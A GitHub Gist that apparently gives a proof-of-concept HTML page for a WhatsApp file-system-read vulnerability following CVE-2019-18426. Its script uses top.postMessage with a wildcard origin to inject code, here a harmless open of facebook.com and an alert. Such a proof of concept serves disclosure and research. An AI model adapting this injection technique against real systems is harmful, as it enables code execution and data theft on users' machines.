Created
August 11, 2020 10:07
-
-
Save galpx/91393071d615e2132eece73284b68f44 to your computer and use it in GitHub Desktop.
WhatsApp FS read vuln post CVE-2019-18426
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head></head> | |
<body> | |
<script> | |
top.postMessage( | |
JSON.stringify( | |
"open('https://facebook.com'); | |
alert('external payload');" | |
), | |
"*"); | |
</script> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment